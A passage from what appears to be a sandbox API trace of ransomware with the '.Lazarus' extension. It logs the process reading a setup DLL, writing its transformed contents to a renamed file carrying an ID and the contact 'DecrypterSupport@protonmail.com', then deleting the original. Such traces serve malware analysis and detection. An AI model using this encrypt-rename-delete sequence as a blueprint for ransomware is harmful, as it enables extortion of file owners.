Size=0x30) returned 0x4dee0 [0068.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.954] AreFileApisANSI () returned 1 [0068.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0068.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0068.954] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58)) returned 1 [0068.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0068.954] AreFileApisANSI () returned 1 [0068.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0068.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.955] GetLastError () returned 0x0 [0068.955] SetLastError (dwErrCode=0x0) [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0068.955] GetLastError () returned 0x0 [0068.955] SetLastError (dwErrCode=0x0) [0068.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0068.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0068.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0068.955] AreFileApisANSI () returned 1 [0068.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0068.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0068.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0068.956] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.956] GetFileType (hFile=0x410) returned 0x1 [0068.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0068.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.956] AreFileApisANSI () returned 1 [0068.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0068.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0068.957] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.957] GetFileType (hFile=0x420) returned 0x1 [0068.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.957] GetLastError () returned 0x0 [0068.957] SetLastError (dwErrCode=0x0) [0068.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.957] GetLastError () returned 0x0 [0068.957] SetLastError (dwErrCode=0x0) [0068.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0068.957] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0068.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0068.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0068.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0068.960] GetLastError () returned 0x0 [0068.960] SetLastError (dwErrCode=0x0) [0068.960] GetLastError () returned 0x0 [0068.960] SetLastError (dwErrCode=0x0) [0068.960] GetLastError () returned 0x0 [0068.960] SetLastError (dwErrCode=0x0) [0068.960] GetLastError () returned 0x0 [0068.960] SetLastError (dwErrCode=0x0) [0068.960] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.960] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.962] GetLastError () returned 0x0 [0068.962] SetLastError (dwErrCode=0x0) [0068.962] GetLastError () returned 0x0 [0068.962] SetLastError (dwErrCode=0x0) [0068.962] GetLastError () returned 0x0 [0068.962] SetLastError (dwErrCode=0x0) [0068.962] GetLastError () returned 0x0 [0068.962] SetLastError (dwErrCode=0x0) [0068.962] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.962] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.963] GetLastError () returned 0x0 [0068.963] SetLastError (dwErrCode=0x0) [0068.963] GetLastError () returned 0x0 [0068.963] SetLastError (dwErrCode=0x0) [0068.963] GetLastError () returned 0x0 [0068.963] SetLastError (dwErrCode=0x0) [0068.963] GetLastError () returned 0x0 [0068.963] SetLastError (dwErrCode=0x0) [0068.963] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.963] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.963] GetLastError () returned 0x0 [0068.964] SetLastError (dwErrCode=0x0) [0068.964] GetLastError () returned 0x0 [0068.964] SetLastError (dwErrCode=0x0) [0068.964] GetLastError () returned 0x0 [0068.964] SetLastError (dwErrCode=0x0) [0068.964] GetLastError () returned 0x0 [0068.964] SetLastError (dwErrCode=0x0) [0068.964] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0xb58, lpOverlapped=0x0) returned 1 [0068.964] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.964] GetLastError () returned 0x0 [0068.964] SetLastError (dwErrCode=0x0) [0068.965] GetLastError () returned 0x0 [0068.965] SetLastError (dwErrCode=0x0) [0068.965] ReadFile (in: hFile=0x420, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.965] GetLastError () returned 0x0 [0068.965] SetLastError (dwErrCode=0x0) [0068.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0068.965] GetLastError () returned 0x0 [0068.965] SetLastError (dwErrCode=0x0) [0068.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0068.965] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xb60, lpOverlapped=0x0) returned 1 [0068.965] GetLastError () returned 0x0 [0068.965] SetLastError (dwErrCode=0x0) [0068.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.965] GetLastError () returned 0x0 [0068.966] SetLastError (dwErrCode=0x0) [0068.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0068.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0068.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.966] CloseHandle (hObject=0x410) returned 1 [0068.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0068.967] CloseHandle (hObject=0x420) returned 1 [0068.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0068.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0068.968] AreFileApisANSI () returned 1 [0068.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0068.968] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.969] GetFileType (hFile=0x420) returned 0x1 [0068.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0068.969] GetLastError () returned 0xb7 [0068.969] SetLastError (dwErrCode=0xb7) [0068.969] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0068.970] CloseHandle (hObject=0x420) returned 1 [0068.970] AreFileApisANSI () returned 1 [0068.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0068.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 46 [0068.970] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 1 [0068.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.972] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6f7, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="̮", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧萐\x07̧비聐蝈\x08賂̧")) returned 0 [0068.972] FindClose (in: hFindFile=0x78410 | out: hFindFile=0x78410) returned 1 [0068.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0068.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0068.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.973] AreFileApisANSI () returned 1 [0068.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044", lpUsedDefaultChar=0x0) returned 27 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0068.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0068.973] AreFileApisANSI () returned 1 [0068.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0068.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78450 [0068.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78450, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044") returned 27 [0068.974] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044" (normalized: 